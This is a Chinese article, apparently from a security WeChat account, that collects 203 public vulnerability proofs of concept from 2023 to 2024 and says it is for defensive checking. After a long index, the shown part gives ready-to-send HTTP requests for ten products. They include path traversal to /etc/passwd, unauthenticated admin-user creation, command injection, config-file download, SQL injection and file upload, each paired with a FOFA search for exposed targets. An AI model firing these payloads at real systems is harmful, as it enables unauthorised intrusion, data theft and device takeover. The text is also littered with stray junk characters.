互联网公开漏洞整理202309-202406" y9 C' h' p( I
道一安全 2024-06-05 07:41 北京' j& d* T: R" K8 L, K$ M0 A% ~5 U' N
以下文章来源于网络安全新视界 ,作者网络安全新视界 Y# ^. z* s! V; j$ E
; _+ d+ ~8 `- s1 O3 c P: E5 A0 X
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
& I: u8 H V9 N: @
M, Q! L5 R7 ]7 z2 F0 s漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。6 X* k9 r) [8 Z; |; O
- Z2 }+ G/ H# F h+ ?安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
- b0 O4 y& m3 x; C ]- y! l6 B6 p* c7 Q, L9 A! M9 s7 F% P! ?* G; C
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
" g+ ]# P* x* h7 f% F9 J: R9 j. Z
! i- G0 O# I6 d- I合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
" p6 Q6 u/ ~2 ^7 v6 _; J) k2 R/ L- ^" e5 Z
; E* g- q" ?3 t* Z! |4 o
声明 s9 n4 n4 p3 Q9 c4 x- _6 t6 a% v4 K" q
4 _9 X( i# E9 T7 J( ?
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
) J/ D G- r2 J% m0 O
0 L3 Q6 H. t. ^; Z4 f% d/ C有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。$ Y; O" P. h, ]) X( n
* k) h% d1 u" X! b9 i
3 `- S" q$ k8 m: y0 J2 x( ~. [# ]" G5 F1 ?: i
目录4 w' D' X2 I7 G% G8 Q: Z
* ]" R6 y3 a, H" o. k
017 g% ~) Q: P. Z$ ?
- Y5 [; ^ k r1 ~1 e0 \7 `1 H1. StarRocks MPP数据库未授权访问1 \1 L U6 H# b6 `. V& f7 g( b
2. Casdoor系统static任意文件读取
! E# n7 m2 s9 d8 _3 a4 |3. EasyCVR智能边缘网关 userlist 信息泄漏
9 |8 a* ^" {$ @ X4. EasyCVR视频管理平台存在任意用户添加
3 n& c w3 U" p7 S+ j, e2 Z5. NUUO NVR 视频存储管理设备远程命令执行
3 Q; B& x# J3 T9 w( y6. 深信服 NGAF 任意文件读取$ B" C0 A! [9 e2 e' Q% b+ E' p5 O
7. 鸿运主动安全监控云平台任意文件下载+ Z. A- W% R# ?3 p
8. 斐讯 Phicomm 路由器RCE6 P" l1 W$ _* ~4 f; u) |% \4 j% A
9. 稻壳CMS keyword 未授权SQL注入+ V8 J. ]! u- g* p. A3 P! x7 N; X: J
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
# N6 i9 s& b: K h9 j4 w( l& C11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
* a5 ~, T5 Q, c1 K12. Jorani < 1.0.2 远程命令执行7 [ _- M Y& n
13. 红帆iOffice ioFileDown任意文件读取
" W" s5 o: N8 U" X& U! K" _14. 华夏ERP(jshERP)敏感信息泄露- x. T, _$ a; O. O2 B. K
15. 华夏ERP getAllList信息泄露- ], F0 U+ p8 c! ^. I; r
16. 红帆HFOffice医微云SQL注入6 ?$ I& A- [7 N
17. 大华 DSS itcBulletin SQL 注入* e9 }4 g2 Y$ k. i# u
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露# U/ M+ Q4 B4 C* u2 }% S$ @& D6 }8 n3 M
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
) _2 Q5 Q3 [" S7 u" x20. 大华ICC智能物联综合管理平台任意文件读取1 U- d1 n0 ]. E
21. 大华ICC智能物联综合管理平台random远程代码执行( \) W5 Q2 N3 n8 j
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
- R& l9 h$ e) D0 v1 x6 G23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
6 s7 I8 G) t' w) d* _/ u24. 用友NC 6.5 accept.jsp任意文件上传
/ v/ ^: d- r, m25. 用友NC registerServlet JNDI 远程代码执行
/ @: F; g ~6 Y# g; | \! y9 D$ N26. 用友NC linkVoucher SQL注入; A- ~" n% _& P& X8 p, M9 q
27. 用友 NC showcontent SQL注入. c+ M! ]7 y+ K& f9 X
28. 用友NC grouptemplet 任意文件上传
+ g5 B4 Z& l+ ~' R7 C29. 用友NC down/bill SQL注入
# T9 V+ w" d! h0 a. w8 i" W7 y3 u30. 用友NC importPml SQL注入
0 G2 h) k! z: ~9 ]) M9 Q. ]! z31. 用友NC runStateServlet SQL注入5 l' E. s5 ^9 ]9 K( W: x: W
32. 用友NC complainbilldetail SQL注入
1 b+ @5 \9 \7 s1 a$ K8 U33. 用友NC downTax/download SQL注入0 R( n# H& t0 k1 c* \1 M
34. 用友NC warningDetailInfo接口SQL注入3 V/ `! w; f( f4 X% K
35. 用友NC-Cloud importhttpscer任意文件上传 N+ ]& {, ]7 f1 l4 c
36. 用友NC-Cloud soapFormat XXE- {7 {3 N! Q7 L& z
37. 用友NC-Cloud IUpdateService XXE
7 R- w( Y6 R2 @% @) d$ Y- a38. 用友U8 Cloud smartweb2.RPC.d XXE
7 l+ w+ R2 L: Y# K* S8 x) o39. 用友U8 Cloud RegisterServlet SQL注入
, {. h: A/ a4 S: t8 M# ^/ r40. 用友U8-Cloud XChangeServlet XXE9 ]' j" `* q, e3 l! ?
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入% z( G W3 F% e _/ k
42. 用友GRP-U8 SmartUpload01 文件上传
' R0 G' \ h- U- c% ~/ Y. y43. 用友GRP-U8 userInfoWeb SQL注入致RCE$ Q" n; N! k0 v" r6 F5 I/ X. w6 C
44. 用友GRP-U8 bx_dj_check.jsp SQL注入3 W7 W3 X( |0 m
45. 用友GRP-U8 ufgovbank XXE
( ^# p8 L# K) _, i/ Y5 n; |: B46. 用友GRP-U8 sqcxIndex.jsp SQL注入
( V2 F8 S' n4 q) Y5 c) b' f4 ~/ {47. 用友GRP A++Cloud 政府财务云 任意文件读取
$ n' t* @" {. H3 ]48. 用友U8 CRM swfupload 任意文件上传+ p$ C* G8 F6 S3 W1 a
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
+ c. J4 R$ m1 F7 ?. S: r1 M50. QDocs Smart School 6.4.1 filterRecords SQL注入
. K8 M0 b+ \" R51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入6 Q! n2 H/ m- F _1 L* M5 n
52. 泛微E-Office json_common.php sql注入
3 [' m& b3 y: P% Y% a" v) e53. 迪普 DPTech VPN Service 任意文件上传
# c; v" i q2 U* s, z54. 畅捷通T+ getstorewarehousebystore 远程代码执行
2 Z& x% _( D+ p, x55. 畅捷通T+ getdecallusers信息泄露3 W3 _! X& Z$ Z# v
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
% T4 z* s: M& t, H& Q, [! R57. 畅捷通T+ keyEdit.aspx SQL注入! Q' ?) d7 r6 {/ A9 C# e! s
58. 畅捷通T+ KeyInfoList.aspx sql注入
- V( S' N4 n' K; M" P" [4 w59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
! ~5 R( z& {2 [: S' B2 A3 ^5 `4 b0 ~60. 百卓Smart管理平台 importexport.php SQL注入
. o& z2 `: v9 x& j L61. 浙大恩特客户资源管理系统 fileupload 任意文件上传 q4 P5 q) s$ G% ~. T( x
62. IP-guard WebServer 远程命令执行
) ~! a c- W2 J63. IP-guard WebServer任意文件读取1 X/ @! L0 q2 M) Q/ x
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
( X$ h$ J# C1 _65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过2 U& _3 r& @3 ]% o# Q& `
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入' K0 n* Z* N. g1 `) l, ?) Q/ ]! \! j
67. 万户ezOFFICE wpsservlet任意文件上传) y, s% c" z% f0 d2 r/ e1 a: K4 o4 ^
68. 万户ezOFFICE wf_printnum.jsp SQL注入
+ C, |- t$ s/ S) d4 D n* V* t69. 万户 ezOFFICE contract_gd.jsp SQL注入3 q' _! r5 B$ w( K8 T
70. 万户ezEIP success 命令执行
5 U) H3 e7 l* Q8 e71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
- b! S7 H6 Z0 ?# |72. 致远OA getAjaxDataServlet XXE' p/ x/ d) R1 s
73. GeoServer wms远程代码执行
! L' A H# Q9 J* s' H74. 致远M3-server 6_1sp1 反序列化RCE; C8 _5 M, _! T% \
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
" h7 a# d) M8 a" ?" u76. 新开普掌上校园服务管理平台service.action远程命令执行
& _3 s$ y1 \) R! i$ e* R9 H77. F22服装管理软件系统UploadHandler.ashx任意文件上传
% Z7 \; f$ W: m( u78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
; k; \* k$ `2 g! V9 {79. BYTEVALUE 百为流控路由器远程命令执行
, D5 w5 M: o ?/ X80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
- k' L1 G' Y# H4 ^81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
& ~6 q# ~; a7 P* i- Z82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行, m) h2 g2 [& ^. _
83. JeecgBoot testConnection 远程命令执行
% c4 _6 f! `" y0 [84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
6 ~( ?0 {6 V& K5 Y! a85. SysAid On-premise< 23.3.36远程代码执行
+ L. E; V( B2 i- O# Z* r3 O* J4 z86. 日本tosei自助洗衣机RCE
/ ~! e* q0 [" S ^4 P87. 安恒明御安全网关aaa_local_web_preview文件上传
3 L* N1 W7 u3 h4 ^ b1 [) ~ d: x88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
4 u# m" R. H# N, O; s8 t0 x89. 致远互联FE协作办公平台editflow_manager存在sql注入
! p" g' ]& r" T, Y! t" h90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
" t0 }/ q1 t3 R$ l: }91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
+ i6 G( T/ \3 C8 Z. w92. 海康威视运行管理中心session命令执行. S2 ~( c/ r; ]
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
- i: o) a f) Z% o0 l94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传! Y. U9 r/ O( a
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行# _' Y4 K" j6 \
96. Apache OFBiz 18.12.11 groovy 远程代码执行
u5 k# v6 R. z; [" o97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
6 q+ x& K* ^3 ]* G9 m) g, _6 [98. SpiderFlow爬虫平台远程命令执行) d0 t. B- ]# S2 D
99. Ncast盈可视高清智能录播系统busiFacade RCE- {% G1 O4 e9 Y8 `! x5 y
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传! n. Q+ Z! O# H; k! w% w( b8 z" A
101. ivanti policy secure-22.6命令注入
% \2 G$ ?8 y0 e; \! f102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
w2 y% |' w7 {4 w. P+ q8 u103. Ivanti Pulse Connect Secure VPN XXE; r( r/ N% @. v3 I8 F- @0 @0 Y
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露 J% J& N# q' U# l4 S: J0 v1 ^ V! ^
105. SpringBlade v3.2.0 export-user SQL 注入, x/ X3 ?0 X( S( F) d
106. SpringBlade dict-biz/list SQL 注入" F! `/ w7 L7 H
107. SpringBlade tenant/list SQL 注入' n, D1 V- B/ \) |" A
108. D-Tale 3.9.0 SSRF
$ g# K; s- {, u/ G# X# B109. Jenkins CLI 任意文件读取6 M8 B" N8 X9 j" u! L& ~9 L! S% q' o
110. Goanywhere MFT 未授权创建管理员
% P8 d* d5 l3 f! Z111. WordPress Plugin HTML5 Video Player SQL注入
! @! q( |! {) C& {6 i112. WordPress Plugin NotificationX SQL 注入! u4 m: C+ |8 q; ~( }
113. WordPress Automatic 插件任意文件下载和SSRF
4 N! f! J5 F, Q114. WordPress MasterStudy LMS插件 SQL注入
1 Z/ ^! p5 b! y- o! c4 P; l/ ^115. WordPress Bricks Builder <= 1.9.6 RCE
" ?, C% E$ U& E- G6 A116. wordpress js-support-ticket文件上传
: ?6 C# V# x! Z1 b8 I( L, k$ x3 g117. WordPress LayerSlider插件SQL注入; h8 ]1 \2 {$ M1 F. L
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传% o& p* U9 N: s: E$ f3 }
119. 北京百绰智能S20后台sysmanageajax.php sql注入
, a* e" I7 R) o% k% }- Y% c) L: }120. 北京百绰智能S40管理平台导入web.php任意文件上传
9 Y) t* n1 O: w/ D121. 北京百绰智能S42管理平台userattestation.php任意文件上传1 z5 x5 H' l$ ^5 ]; s7 y5 U
122. 北京百绰智能s200管理平台/importexport.php sql注入
/ O2 x* F) u* i, Z6 D& {123. Atlassian Confluence 模板注入代码执行
: E1 H+ n( V8 F124. 湖南建研工程质量检测系统任意文件上传& ?) Z/ t8 b/ j: ]/ b L1 m! X. w$ ~
125. ConnectWise ScreenConnect身份验证绕过
4 s8 o4 \7 \3 d) x126. Aiohttp 路径遍历( N1 v1 A3 o; c" F7 @
127. 广联达Linkworks DataExchange.ashx XXE; y8 U/ y) Q4 O
128. Adobe ColdFusion 反序列化
) ^* r, h; f' C: h' t. x! |' I129. Adobe ColdFusion 任意文件读取& j( u# ^: u' {6 F5 q# U6 m) [
130. Laykefu客服系统任意文件上传5 A$ R8 {, ^9 e% i* k
131. Mini-Tmall <=20231017 SQL注入
0 J) i) Y7 Q$ |9 f132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过) d$ K$ Y( t. p0 O
133. H5 云商城 file.php 文件上传
6 d" Q; i: x- V ]. U* }. A, X# E134. 网康NS-ASG应用安全网关index.php sql注入
' |+ N: g$ ?& s/ D, U4 r# c135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 r/ A0 Y$ e- D" x' l3 t136. NextChat cors SSRF
% N4 m7 e# c& q+ \: d a- h7 K137. 福建科立迅通信指挥调度平台down_file.php sql注入
. u; o! G( @3 \2 x: G0 u& F138. 福建科立讯通信指挥调度平台pwd_update.php sql注入0 u; S7 S% P. d( J$ v. t
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
\6 |5 t3 T5 H9 U& u' }* P140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入: h8 G& y/ |% e: u4 v
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入7 }! d' {; F5 E
142. CMSV6车辆监控平台系统中存在弱密码
, I3 T- m( `2 C4 S! a( w9 p143. Netis WF2780 v2.1.40144 远程命令执行/ o6 {$ o5 L5 P( s
144. D-Link nas_sharing.cgi 命令注入
% j: X3 I" t% l6 e* t145. Palo Alto Networks PAN-OS GlobalProtect 命令注入5 L5 s; _ M7 [6 x4 G) h& S0 X
146. MajorDoMo thumb.php 未授权远程代码执行
9 T6 _) f: o1 x2 w& k8 \. I& S147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
: e1 m) U2 W7 i: k) Q148. CrushFTP 认证绕过模板注入
% \# q/ [' C9 H2 P+ g9 a" P149. AJ-Report开源数据大屏存在远程命令执行5 f0 ?4 H. U6 r: F/ w( l! R
150. AJ-Report 1.4.0 认证绕过与远程代码执行
( {0 Q# D j E1 k! f) k) b0 ?% R151. AJ-Report 1.4.1 pageList sql注入9 S( H* O* r1 U$ C
152. Progress Kemp LoadMaster 远程命令执行- }7 l! u7 _* U5 c) Q6 o2 N
153. gradio任意文件读取
6 X3 l/ h$ `' o6 n154. 天维尔消防救援作战调度平台 SQL注入
$ E( {- A4 p# t; a$ F2 T155. 六零导航页 file.php 任意文件上传7 P0 g+ l+ M4 E" X- v7 n$ t* ~
156. TBK DVR-4104/DVR-4216 操作系统命令注入
, W8 ^0 ~. N9 Y- J1 p# v0 Y157. 美特CRM upload.jsp 任意文件上传% ~' a7 B* i" x, {6 P: ~
158. Mura-CMS-processAsyncObject存在SQL注入6 I. o! n0 J" ^% \
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
! i# ~6 m- P* A" b% \' ?. `- [160. Sonatype Nexus Repository 3目录遍历与文件读取0 Q; q# e0 x: w
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
$ p3 ~* I7 }, ]8 b# S162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传0 `1 o9 K1 _0 a* ]* P3 Y$ {
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传; r9 T2 Q) n: H+ p. a$ q
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传! v0 C+ n6 B6 ]4 f+ e' W' A
165. OrangeHRM 3.3.3 SQL 注入. n2 J1 u1 P3 ]% d6 \1 d
166. 中成科信票务管理平台SeatMapHandler SQL注入6 T/ T3 O1 e' ]( K
167. 精益价值管理系统 DownLoad.aspx任意文件读取( {/ w: d+ Y3 T& ?, J5 `
168. 宏景EHR OutputCode 任意文件读取
& v, U8 L4 f3 y" y1 S3 G169. 宏景EHR downlawbase SQL注入% C8 ^6 F, j2 e1 N) W' a( M
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
3 k: Z9 Q) P- I0 j" L0 t# I; q171. 通天星CMSV6车载定位监控平台 SQL注入
+ E# c* A% w6 G4 U172. DT-高清车牌识别摄像机任意文件读取
7 {9 T1 K/ F$ c! x% J% r173. Check Point 安全网关任意文件读取
9 q4 o4 @! }/ I! }1 w: d174. 金和OA C6 FileDownLoad.aspx 任意文件读取
/ b, I; M: ]5 o: {( v% w d) {: D175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
7 T! @; i5 b5 I176. 电信网关配置管理系统 rewrite.php 文件上传
! u* O- u1 I4 F. \# g177. H3C路由器敏感信息泄露
* e" E, e3 E L, l- _0 H4 A. j178. H3C校园网自助服务系统-flexfileupload-任意文件上传
) i) [7 v% G4 n( t9 e179. 建文工程管理系统存在任意文件读取
! r& }9 _* Z" b- N$ P180. 帮管客 CRM jiliyu SQL注入( }2 Q4 Q8 [/ e; M/ b5 y# s
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
- D/ ~' m$ ~) `7 Y5 y1 }" ?182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建9 |4 y! g* n- j
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
6 l4 p4 ?, x \: a' j. y9 m+ j" j- L184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
3 b2 E. w f/ d$ n0 n3 i6 k6 H185. 瑞友天翼应用虚拟化系统SQL注入9 z/ z, o# ~6 D" k" A4 y+ I
186. F-logic DataCube3 SQL注入
+ Z, i) w4 [9 ~* i+ A% a187. Mura CMS processAsyncObject SQL注入
7 L$ }6 _5 C A1 O) {8 _188. 叁体-佳会视频会议 attachment 任意文件读取
; _; o; E4 W, \189. 蓝网科技临床浏览系统 deleteStudy SQL注入( p+ D8 ~ o0 d
190. 短视频矩阵营销系统 poihuoqu 任意文件读取4 T6 N! b$ ?/ X3 @/ y
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入* d8 K# [6 ~+ R+ O
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
8 C W5 }5 @; t193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行/ C% X: e, B6 ^+ `
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
/ x0 Q( D5 k; b& ^195. 飞鱼星上网行为管理系统 send_order.cgi命令执行7 r$ s. M" n6 a# m$ ^/ A# Y
196. 河南省风速科技统一认证平台密码重置
( q7 c3 B; B- z/ v197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入7 A2 V9 Y% `9 L1 q5 u( y }
198. 阿里云盘 WebDAV 命令注入5 z$ x! Z$ I4 F0 O h
199. cockpit系统assetsmanager_upload接口 文件上传
; I0 u& o- ~5 ? c200. SeaCMS海洋影视管理系统dmku SQL注入
8 g7 [4 L; ?8 ~& o M8 N, {4 _! \201. 方正全媒体新闻采编系统 binary SQL注入
" H9 V# k$ T/ s* n( J7 W# ?/ @, e202. 微擎系统 AccountEdit任意文件上传/ h: G P/ @# P. c
203. 红海云EHR PtFjk 文件上传
3 X) B5 Z! v O: y6 }# V& {5 j1 w$ Y5 P+ G$ \8 w
POC列表
. {1 f7 Z) t# ^0 ~7 t; S9 e3 R* { I7 U& z1 `0 Z; h# C' }
024 `2 K% e+ {8 D' W& R: `
; _; @+ @/ N/ [; y
1. StarRocks MPP数据库未授权访问
: c& w1 L/ H7 D+ i% p7 r fFOFA :title="StarRocks"
; ^" _9 r2 u0 ]/ F2 ^GET /mem_tracker HTTP/1.1
) Q/ _- \ a5 `( | gHost: URL4 O2 I4 I$ Z) q; p
/ N7 I$ f- N' }1 Y1 U4 L, E
& `' I5 l0 c3 }1 h, s+ a9 v2. Casdoor系统static任意文件读取
* H, q# Q2 q" }FOFA :title="Casdoor"
/ `4 Q9 J' }; U3 `5 mGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
/ Q+ y' j# W/ nHost: xx.xx.xx.xx:99996 Z1 e, j1 n0 z. |; K1 L
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 V& F% }" ]0 `) }; z; FConnection: close& C& {5 Q7 S7 R7 G
Accept: */*
# E) Y) z( R1 XAccept-Language: en
- Q7 q# M$ Y2 R( z: t& v! B, FAccept-Encoding: gzip
7 R. K/ s. W, C; B3 h: N; W7 ^9 k; |
3 X* _. f( ?6 S/ l$ b) @3. EasyCVR智能边缘网关 userlist 信息泄漏 ~5 v5 N3 L G( ?$ a9 W9 ]# n- ]
FOFA :title="EasyCVR"2 |, N0 @ e+ S% H
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1+ I0 m/ ~2 i4 g3 M
Host: xx.xx.xx.xx
" K. E& @7 a% C; z3 s. R) G- W
4 z1 u# ~: H) @8 W1 Z, M
+ J& @$ E0 Z/ v$ E1 t4. EasyCVR视频管理平台存在任意用户添加: D+ _5 f: a6 R5 \' c
FOFA :title="EasyCVR"6 T5 p8 Z6 Z- X4 x) B
' L7 w8 ?6 b- M9 i. V( L
password更改为自己的密码md5
: p* z% Z" e$ r5 fPOST /api/v1/adduser HTTP/1.12 m3 ` l2 }0 S+ @0 p
Host: your-ip
9 Y$ l: k' a2 ?. y3 fContent-Type: application/x-www-form-urlencoded; charset=UTF-8" [) O) M! B: p- A( }5 |) V' |- G
8 d V6 i; U! j" M. H8 x8 Oname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
4 B }' F, y' V, l$ [/ T, F5 j* U. K4 n, y+ U1 H6 o
8 |' Q; l. U% ]% u7 C
5. NUUO NVR 视频存储管理设备远程命令执行. d8 D+ M+ f H; ~
FOFA:title="Network Video Recorder Login"7 W m4 t! @1 B6 ]* H8 m- d0 ^
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
4 K$ W; K5 b5 O1 Z6 k* M( cHost: xx.xx.xx.xx
3 N% G- {- B: A, ~' B: J
: E9 t6 m# P& }7 [
' q! d' \" [0 P' i3 x1 S8 ~% k( Y6. 深信服 NGAF 任意文件读取
2 B5 m6 c4 g4 }: YFOFA:title="SANGFOR | NGAF"" D9 k" P$ f6 |+ b# J
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.16 e& }" D( p8 V5 j3 N
Host:
3 U+ M1 C. w1 _) S$ g: ?" c. j6 W) P9 U2 K: z1 g/ \& [
& m ^1 s/ \ I7 K6 a$ d0 @- G$ Y' u
7. 鸿运主动安全监控云平台任意文件下载
! x# c+ ^$ _% U& G" i( Y0 rFOFA:body="./open/webApi.html"1 O0 O9 M) m. f7 D% u% F
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
& Q% s/ F3 e4 r9 Q# @% tHost:* q# g2 p* P" K+ q) }
' M$ M7 W& n4 a1 Z* _* P' h
5 i4 x. r/ P5 u5 N. k; b. d3 }3 M8. 斐讯 Phicomm 路由器RCE
9 b7 @* d5 `" m! J& mFOFA:icon_hash="-1344736688"; Q, p4 ] v$ w; z& Q( }
默认账号admin登录后台后,执行操作
5 [+ ^) `7 a L$ d+ }POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.17 h' {: ?! P9 V* W. O! l1 Q
Host: x.x.x.x
/ s. j- S: c) }9 e/ l0 dCookie: sysauth=第一步登录获取的cookie
_: K9 W8 r$ x# r( V7 @Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz& R" g3 P! o. I1 C- P3 Y; k+ }
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 P8 w$ Q1 R# S: P& i
% B: L4 @& H6 b------WebKitFormBoundaryxbgjoytz* a1 N/ g7 R, |4 z- B
Content-Disposition: form-data; name="wifiRebootEnablestatus"$ o0 E1 r6 \+ |3 W: l: T+ E4 i. N
# y' L& `# b% e: W%s* o0 N4 |* }/ {( z6 H" ^
------WebKitFormBoundaryxbgjoytz8 ^$ }3 d$ h/ V: Q5 T) Y
Content-Disposition: form-data; name="wifiRebootrange"4 x; t3 _; P M! f" g5 j
+ G1 }0 q7 B# x: C
12:00; id;
3 `5 a" ?, E, g9 N------WebKitFormBoundaryxbgjoytz5 h8 A7 r3 U/ n0 g6 @ W3 d6 u
Content-Disposition: form-data; name="wifiRebootendrange"
3 C E3 f& {5 @$ f, R3 r
& |$ O" n/ h0 L%s:
+ R" S" M6 X+ g2 V% S------WebKitFormBoundaryxbgjoytz4 N+ n8 h4 Y. |0 G6 r- [% Z- ~
Content-Disposition: form-data; name="cururl2"
+ Z9 T) Q: \& x5 R! H1 [
& D) v; |; k* {( e5 y0 w- u d2 K+ t. L2 {5 h" Y- E
------WebKitFormBoundaryxbgjoytz--
3 u& a" a" g! O$ R' p6 T/ G
0 d; Q: f4 v+ @# ] R7 d( O- P
3 }) Q8 ^0 p2 ?5 y9 z9. 稻壳CMS keyword 未授权SQL注入
E- V2 w; f6 {# U& I6 lFOFA:app="Doccms"
+ J. g7 `6 Z1 u4 |7 E7 w) gGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
- G1 A* z8 j3 m- { g# vHost: x.x.x.x
5 A* K# h q* k$ Z" A& ~- Q2 x7 ^* `/ C f) h7 g
( o6 i6 [8 O$ K, }3 P8 V
payload为下列语句的二次Url编码
% V+ }7 O4 V F7 i* a* T' M) x
3 s$ ]9 w5 e8 f+ O1 E K' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
+ ~7 A# L( n8 H+ b6 O, O* ?: {$ m; |$ b
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
D# [# K7 l9 w1 Q9 l9 jFOFA:icon_hash="953405444"
M0 {6 M5 k8 K9 s* Q' u, s% o& h/ a1 N! j8 }8 R
文件上传后响应中包含上传文件的路径
h( M, U' z' r! h8 P, `) }5 yPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
" e% e V+ c# E5 ]; m) ^3 M& y' T: _; q6 bHost: x.x.x.x:xx& c9 e/ h4 P6 A R2 w$ `! W3 I, C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36/ |8 ?$ l3 a0 ^
Content-Length: 197
|& v: r& i2 [$ J! h3 u+ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
0 S& O) b! ]+ i! W9 Y% x, U9 B$ QAccept-Encoding: gzip, deflate* F8 x4 B- P4 [0 [4 m
Accept-Language: zh-CN,zh;q=0.9. m& C; I' h0 g7 T% W6 O0 C8 s
Connection: close
* x, V1 f/ i' T/ S- b/ r! `Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
+ @0 v5 N2 ~) }. i6 p! J* D
1 J2 u& U" k6 r! `- t2 C; V0 E------WebKitFormBoundaryxdgaqmqu0 L9 l: Y5 d" I( {2 `: w
Content-Disposition: form-data; name="file"filename="icfitnya.txt", V) D/ ^# Z5 D: e
Content-Type: text/html
7 M6 J7 y0 x/ h" H5 z9 I4 u% \; v
jmnqjfdsupxgfidopeixbgsxbf) ~( z% a+ e. f
------WebKitFormBoundaryxdgaqmqu--! j2 F) l5 Y) @! R* u; |
$ t4 I& w. K8 _$ z: ], P
1 M( x) t$ R1 {. _' J
